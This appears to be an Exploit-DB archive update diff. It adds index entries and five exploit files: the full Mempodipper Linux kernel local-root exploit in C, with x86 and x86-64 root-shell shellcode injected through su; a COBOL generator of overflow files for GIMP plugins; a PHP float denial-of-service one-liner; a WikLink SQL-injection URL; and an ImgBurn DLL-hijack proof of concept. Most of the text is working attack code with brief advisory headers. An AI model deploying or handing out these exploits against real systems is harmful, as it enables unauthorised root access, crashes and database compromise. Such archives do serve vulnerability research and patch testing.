Updated 11_07_2014

files.csv

@@ -31669,3 +31669,8 @@ id,file,description,date,author,platform,type,port
 35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0
 35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0
 35158,platforms/windows/dos/35158.py,"Mongoose 2.11 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0
+35161,platforms/linux/local/35161.txt,"Linux Local Root => 2.6.39 (32-bit & 64-bit) - Mempodipper #2",2012-01-12,zx2c4,linux,local,0
+35162,platforms/linux/dos/35162.cob,"GIMP <= 2.6.7 Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0
+35163,platforms/windows/dos/35163.c,"ImgBurn 2.4 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-01-01,d3c0der,windows,dos,0
+35164,platforms/php/dos/35164.php,"PHP <= 5.3.2 'zend_strtod()' Function Floating-Point Value Denial of Service Vulnerability",2011-01-03,"Rick Regan",php,dos,0
+35165,platforms/php/webapps/35165.txt,"WikLink 0.1.3 'getURL.php' SQL Injection Vulnerability",2011-01-05,"Aliaksandr Hartsuyeu",php,webapps,0

platforms/linux/dos/35162.cob

@@ -0,0 +1,162 @@
+source: http://www.securityfocus.com/bid/45647/info
+
+GIMP is prone to multiple remote stack-based buffer-overflow vulnerabilities because it fails to perform adequate checks on user-supplied input.
+
+Successfully exploiting these issues may allow remote attackers to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
+
+GIMP 2.6.11 is vulnerable; other versions may also be affected. 
+
+000010 IDENTIFICATION DIVISION.
+000020 PROGRAM-ID.              GIMP-OVERFLOWS-POC-IN-COBOL.
+000030 AUTHOR.                  NON-CUSTOMERS CREW.
+000040*SHOE SIZE DECLARATION.   43.
+000050
+000060 ENVIRONMENT DIVISION.
+000070 INPUT-OUTPUT SECTION.
+000080 FILE-CONTROL.
+000090     SELECT FILE01 ASSIGN TO "GIMP01.LIGHTINGPRESETS"
+000100         ORGANIZATION IS LINE SEQUENTIAL.
+000110     SELECT FILE02 ASSIGN TO "GIMP02.SPHEREDESIGNER"
+000120         ORGANIZATION IS LINE SEQUENTIAL.
+000130     SELECT FILE03 ASSIGN TO "GIMP03.GFIG"
+000140         ORGANIZATION IS LINE SEQUENTIAL.
+000150*    FOR THE 4TH OVERFLOW, SEE BELOW.
+000160
+000170 DATA DIVISION.
+000180 FILE SECTION.
+000190 FD FILE01.
+000200 01 PRINTLINE   PIC X(800).
+000210 FD FILE02.
+000220 01 QRINTLINE   PIC X(800).
+000230 FD FILE03.
+000240 01 RRINTLINE   PIC X(800).
+000250
+000260 WORKING-STORAGE SECTION.
+000270 01 TEXT-OUT1   PIC X(29) VALUE 'Number of lights: 1'.
+000280 01 TEXT-OUT2   PIC X(29) VALUE 'Type: Point'.
+000290 01 TEXT-OUT3   PIC X(29) VALUE 'Position: A'.
+000300 01 TEXT-OUT4   PIC X(29) VALUE 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
+000310 01 TEXT-OUT5   PIC X(29) VALUE ' -1 1'.
+000320 01 TEXT-OUT6   PIC X(29) VALUE 'Direction: -1 -1 1'.
+000330 01 TEXT-OUT7   PIC X(29) VALUE 'Color: 1 1 1'.
+000340 01 TEXT-OUT8   PIC X(29) VALUE 'Intensity: 1'.
+000350 01 TEXU-OUT1   PIC X(29) VALUE '0 0 A'.
+000360 01 TEXU-OUT2   PIC X(29) VALUE 'A 1 1 1 0 0 0 1 1 0 1 1 1 1 1'.
+000370 01 TEXU-OUT3   PIC X(29) VALUE '0 0 0 0 0 0 0'.
+000380 01 TEXV-OUT1   PIC X(29) VALUE 'GFIG Version 0.2'.
+000390 01 TEXV-OUT2   PIC X(29) VALUE 'Name: First\040Gfig'.
+000400 01 TEXV-OUT3   PIC X(29) VALUE 'Version: 0.000000'.
+000410 01 TEXV-OUT4   PIC X(29) VALUE 'ObjCount: 0'.
+000420 01 TEXV-OUT5   PIC X(29) VALUE '<OPTIONS>'.
+000430 01 TEXV-OUT6   PIC X(29) VALUE 'GridSpacing: 30'.
+000440 01 TEXV-OUT7   PIC X(29) VALUE 'GridType: RECT_GRID'.
+000450 01 TEXV-OUT8   PIC X(29) VALUE 'DrawGrid: FALSE'.
+000460 01 TEXV-OUT9   PIC X(29) VALUE 'Snap2Grid: FALSE'.
+000470 01 TEXV-OUTA   PIC X(29) VALUE 'LockOnGrid: FALSE'.
+000480 01 TEXV-OUTB   PIC X(29) VALUE 'ShowControl: TRUE'.
+000490 01 TEXV-OUTC   PIC X(29) VALUE '</OPTIONS>'.
+000500 01 TEXV-OUTD   PIC X(29) VALUE '<Style Base>'.
+000510 01 TEXV-OUTE   PIC X(29) VALUE 'BrushName:      Circle (11)'.
+000520 01 TEXV-OUTF   PIC X(29) VALUE 'PaintType:       1'.
+000530 01 TEXV-OUTG   PIC X(29) VALUE 'FillType:       0'.
+000540 01 TEXV-OUTH   PIC X(29) VALUE 'FillOpacity:    100'.
+000550 01 TEXV-OUTI   PIC X(29) VALUE 'Pattern:        Pine'.
+000560 01 TEXV-OUTJ   PIC X(29) VALUE 'Gradient:      FG to BG (RGB)'.
+000570 01 TEXV-OUTK   PIC X(29) VALUE 'Foreground: A'.
+000580 01 TEXV-OUTL   PIC X(29) VALUE 'AA 0 0 1'.
+000590 01 TEXV-OUTM   PIC X(29) VALUE 'Background: 1 1 1 1'.
+000600 01 TEXV-OUTN   PIC X(29) VALUE '</Style>'.
+000610
+000620 PROCEDURE DIVISION.
+000630 MAIN-PARAGRAPH.
+000640*   1. FILTERS > LIGHT AND SHADOW > LIGHTING EFFECTS > LIGHT > OPEN
+000650        OPEN OUTPUT FILE01.
+000660        WRITE PRINTLINE FROM TEXT-OUT1.
+000670        WRITE PRINTLINE FROM TEXT-OUT2.
+000680        WRITE PRINTLINE FROM TEXT-OUT3 AFTER ADVANCING 0 LINES.
+000690        WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000700        WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000710        WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000720        WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000730        WRITE PRINTLINE FROM TEXT-OUT5.
+000740        WRITE PRINTLINE FROM TEXT-OUT6.
+000750        WRITE PRINTLINE FROM TEXT-OUT7.
+000760        WRITE PRINTLINE FROM TEXT-OUT8.
+000770        CLOSE FILE01.
+000780
+000790*   2. FILTERS > RENDER > SPHERE DESIGNER > OPEN
+000800        OPEN OUTPUT FILE02.
+000810        WRITE QRINTLINE FROM TEXU-OUT1 AFTER ADVANCING 0 LINES.
+000820        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000830        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000840        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000850        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000860        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000870        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000880        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000890        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000900        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000910        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000920        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000930        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000940        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000950        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000960        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000970        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000980        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000990        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001000        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001010        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001020        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001030        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001040        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001050        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001060        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001070        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001080        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001090        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001100        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001110        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001120        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001130        WRITE QRINTLINE FROM TEXU-OUT2 AFTER ADVANCING 0 LINES.
+001140        WRITE QRINTLINE FROM TEXU-OUT3.
+001150        CLOSE FILE02.
+001160
+001170*   3. FILTERS > RENDER > GFIG > FILE > OPEN
+001180        OPEN OUTPUT FILE03.
+001190        WRITE RRINTLINE FROM TEXV-OUT1.
+001200        WRITE RRINTLINE FROM TEXV-OUT2.
+001210        WRITE RRINTLINE FROM TEXV-OUT3.
+001220        WRITE RRINTLINE FROM TEXV-OUT4.
+001230        WRITE RRINTLINE FROM TEXV-OUT5.
+001240        WRITE RRINTLINE FROM TEXV-OUT6.
+001250        WRITE RRINTLINE FROM TEXV-OUT7.
+001260        WRITE RRINTLINE FROM TEXV-OUT8.
+001270        WRITE RRINTLINE FROM TEXV-OUT9.
+001280        WRITE RRINTLINE FROM TEXV-OUTA.
+001290        WRITE RRINTLINE FROM TEXV-OUTB.
+001300        WRITE RRINTLINE FROM TEXV-OUTC.
+001310        WRITE RRINTLINE FROM TEXV-OUTD.
+001320        WRITE RRINTLINE FROM TEXV-OUTE.
+001330        WRITE RRINTLINE FROM TEXV-OUTF.
+001340        WRITE RRINTLINE FROM TEXV-OUTG.
+001350        WRITE RRINTLINE FROM TEXV-OUTH.
+001360        WRITE RRINTLINE FROM TEXV-OUTI.
+001370        WRITE RRINTLINE FROM TEXV-OUTJ.
+001380        WRITE RRINTLINE FROM TEXV-OUTK AFTER ADVANCING 0 LINES.
+001390        WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001400        WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001410        WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001420        WRITE RRINTLINE FROM TEXV-OUTL.
+001430        WRITE RRINTLINE FROM TEXV-OUTM.
+001440        WRITE RRINTLINE FROM TEXV-OUTN.
+001450        CLOSE FILE03.
+001460
+001470*   4. THE FUNCTION "read_channel_data()" IN plug-ins/common/file-psp.c HAS AN
+001480*      OVERFLOW WHEN HANDLING PSP_COMP_RLE TYPE FILES. A MALICIOUS FILE THAT
+001490*      STARTS A LONG RUNCOUNT AT THE END OF AN IMAGE WILL WRITE OUTSIDE OF
+001500*      ALLOCATED MEMORY. WE DON'T HAVE A POC FOR THIS BUG.
+001510
+001520*      HAPPY NEW YEAR!!!               http://rock-madrid.com/
+001530
+001540        STOP RUN.

platforms/linux/local/35161.txt

@@ -0,0 +1,291 @@
+/*Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
+Blog post about it is here: http://blog.zx2c4.com/749
+*/
+
+/*
+ * Mempodipper
+ * by zx2c4
+ * 
+ * Linux Local Root Exploit
+ * 
+ * Rather than put my write up here, per usual, this time I've put it
+ * in a rather lengthy blog post: http://blog.zx2c4.com/749
+ * 
+ * Enjoy.
+ * 
+ * - zx2c4
+ * Jan 21, 2012
+ * 
+ * CVE-2012-0056
+ */
+
+#define _LARGEFILE64_SOURCE
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <sys/wait.h>
+#include <sys/types.h>
+#include <sys/user.h>
+#include <sys/ptrace.h>
+#include <sys/reg.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <limits.h>
+
+char *prog_name;
+
+int send_fd(int sock, int fd)
+{
+	char buf[1];
+	struct iovec iov;
+	struct msghdr msg;
+	struct cmsghdr *cmsg;
+	int n;
+	char cms[CMSG_SPACE(sizeof(int))];
+
+	buf[0] = 0;
+	iov.iov_base = buf;
+	iov.iov_len = 1;
+
+	memset(&msg, 0, sizeof msg);
+	msg.msg_iov = &iov;
+	msg.msg_iovlen = 1;
+	msg.msg_control = (caddr_t)cms;
+	msg.msg_controllen = CMSG_LEN(sizeof(int));
+
+	cmsg = CMSG_FIRSTHDR(&msg);
+	cmsg->cmsg_len = CMSG_LEN(sizeof(int));
+	cmsg->cmsg_level = SOL_SOCKET;
+	cmsg->cmsg_type = SCM_RIGHTS;
+	memmove(CMSG_DATA(cmsg), &fd, sizeof(int));
+
+	if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
+		return -1;
+	close(sock);
+	return 0;
+}
+
+int recv_fd(int sock)
+{
+	int n;
+	int fd;
+	char buf[1];
+	struct iovec iov;
+	struct msghdr msg;
+	struct cmsghdr *cmsg;
+	char cms[CMSG_SPACE(sizeof(int))];
+	
+	iov.iov_base = buf;
+	iov.iov_len = 1;
+
+	memset(&msg, 0, sizeof msg);
+	msg.msg_name = 0;
+	msg.msg_namelen = 0;
+	msg.msg_iov = &iov;
+	msg.msg_iovlen = 1;
+
+	msg.msg_control = (caddr_t)cms;
+	msg.msg_controllen = sizeof cms;
+
+	if ((n = recvmsg(sock, &msg, 0)) < 0)
+		return -1;
+	if (n == 0)
+		return -1;
+	cmsg = CMSG_FIRSTHDR(&msg);
+	memmove(&fd, CMSG_DATA(cmsg), sizeof(int));
+	close(sock);
+	return fd;
+}
+
+unsigned long ptrace_address()
+{
+	int fd[2];
+	printf("[+] Creating ptrace pipe.\n");
+	pipe(fd);
+	fcntl(fd[0], F_SETFL, O_NONBLOCK);
+
+	printf("[+] Forking ptrace child.\n");
+	int child = fork();
+	if (child) {
+		close(fd[1]);
+		char buf;
+		printf("[+] Waiting for ptraced child to give output on syscalls.\n");
+		for (;;) {
+			wait(NULL);
+			if (read(fd[0], &buf, 1) > 0)
+				break;
+			ptrace(PTRACE_SYSCALL, child, NULL, NULL);
+		}
+		
+		printf("[+] Error message written. Single stepping to find address.\n");
+		struct user_regs_struct regs;
+		for (;;) {
+			ptrace(PTRACE_SINGLESTEP, child, NULL, NULL);
+			wait(NULL);
+			ptrace(PTRACE_GETREGS, child, NULL, &regs);
+#if defined(__i386__)
+#define instruction_pointer regs.eip
+#define upper_bound 0xb0000000
+#elif defined(__x86_64__)
+#define instruction_pointer regs.rip
+#define upper_bound 0x700000000000
+#else
+#error "That platform is not supported."
+#endif
+			if (instruction_pointer < upper_bound) {
+				unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
+				if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */)
+					return instruction_pointer;
+			}
+		}
+	} else {
+		printf("[+] Ptrace_traceme'ing process.\n");
+		if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0) {
+			perror("[-] ptrace");
+			return 0;
+		}
+		close(fd[0]);
+		dup2(fd[1], 2);
+		execl("/bin/su", "su", "not-a-valid-user", NULL);
+	}
+	return 0;
+}
+
+unsigned long objdump_address()
+{
+	FILE *command = popen("objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r");
+	if (!command) {
+		perror("[-] popen");
+		return 0;
+	}
+	char result[32];
+	fgets(result, 32, command);
+	pclose(command);
+	return strtoul(result, NULL, 16);
+}
+
+unsigned long find_address()
+{
+	printf("[+] Ptracing su to find next instruction without reading binary.\n");
+	unsigned long address = ptrace_address();
+	if (!address) {
+		printf("[-] Ptrace failed.\n");
+		printf("[+] Reading su binary with objdump to find exit@plt.\n");
+		address = objdump_address();
+		if (address == ULONG_MAX || !address) {
+			printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");
+			printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", prog_name, prog_name);
+			exit(-1);
+		}
+	}
+	printf("[+] Resolved call address to 0x%lx.\n", address);
+	return address;
+}
+
+int su_padding()
+{
+	printf("[+] Calculating su padding.\n");
+	FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r");
+	if (!command) {
+		perror("[-] popen");
+		exit(1);
+	}
+	char result[256];
+	fgets(result, 256, command);
+	pclose(command);
+	return strstr(result, "this-user-does-not-exist") - result;
+}
+
+int child(int sock)
+{
+	char parent_mem[256];
+	sprintf(parent_mem, "/proc/%d/mem", getppid());
+	printf("[+] Opening parent mem %s in child.\n", parent_mem);
+	int fd = open(parent_mem, O_RDWR);
+	if (fd < 0) {
+		perror("[-] open");
+		return 1;
+	}
+	printf("[+] Sending fd %d to parent.\n", fd);
+	send_fd(sock, fd);
+	return 0;
+}
+
+int parent(unsigned long address)
+{
+	int sockets[2];
+	printf("[+] Opening socketpair.\n");
+	if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) {
+		perror("[-] socketpair");
+		return 1;
+	}
+	if (fork()) {
+		printf("[+] Waiting for transferred fd in parent.\n");
+		int fd = recv_fd(sockets[1]);
+		printf("[+] Received fd at %d.\n", fd);
+		if (fd < 0) {
+			perror("[-] recv_fd");
+			return 1;
+		}
+		printf("[+] Assigning fd %d to stderr.\n", fd);
+		dup2(2, 15);
+		dup2(fd, 2);
+
+		unsigned long offset = address - su_padding();
+		printf("[+] Seeking to offset 0x%lx.\n", offset);
+		lseek64(fd, offset, SEEK_SET);
+		
+#if defined(__i386__)
+		// See shellcode-32.s in this package for the source.
+		char shellcode[] =
+			"\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
+			"\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
+			"\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
+			"\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
+			"\x80";
+#elif defined(__x86_64__)
+		// See shellcode-64.s in this package for the source.
+		char shellcode[] =
+			"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48"
+			"\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f"
+			"\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7"
+			"\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50"
+			"\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
+#else
+#error "That platform is not supported."
+#endif
+		printf("[+] Executing su with shellcode.\n");
+		execl("/bin/su", "su", shellcode, NULL);
+	} else {
+		char sock[32];
+		sprintf(sock, "%d", sockets[0]);
+		printf("[+] Executing child from child fork.\n");
+		execl("/proc/self/exe", prog_name, "-c", sock, NULL);
+	}
+	return 0;
+}
+
+int main(int argc, char **argv)
+{
+	prog_name = argv[0];
+	
+	if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c')
+		return child(atoi(argv[2]));
+	
+	printf("===============================\n");
+	printf("=          Mempodipper        =\n");
+	printf("=           by zx2c4          =\n");
+	printf("=         Jan 21, 2012        =\n");
+	printf("===============================\n\n");
+	
+	if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')
+		return parent(strtoul(argv[2], NULL, 16));
+	else
+		return parent(find_address());
+	
+}

platforms/php/dos/35164.php

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45668/info
+
+PHP is prone to a remote denial-of-service vulnerability.
+
+Successful attacks will cause applications written in PHP to hang, creating a denial-of-service condition.
+
+PHP 5.3.3 is vulnerable; other versions may also be affected. 
+
+<?php $d = 2.2250738585072011e-308; ?>

platforms/php/webapps/35165.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45673/info
+
+WikLink is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+WikLink 0.1.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wiklink/getURL.php?id=-1' union select 1111/* 

platforms/windows/dos/35163.c

@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/45657/info
+
+ImgBurn is prone to an arbitrary-code-execution vulnerability.
+
+An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
+
+ImgBurn 2.4.0.0 is vulnerable; other versions may also be affected. 
+
+#include <windows.h>
+#define DllExport __declspec (dllexport)
+DllExport void DwmSetWindowAttribute() { egg(); }
+
+int egg()
+{
+    system ("calc");
+        exit(0);
+        return 0;
+}
+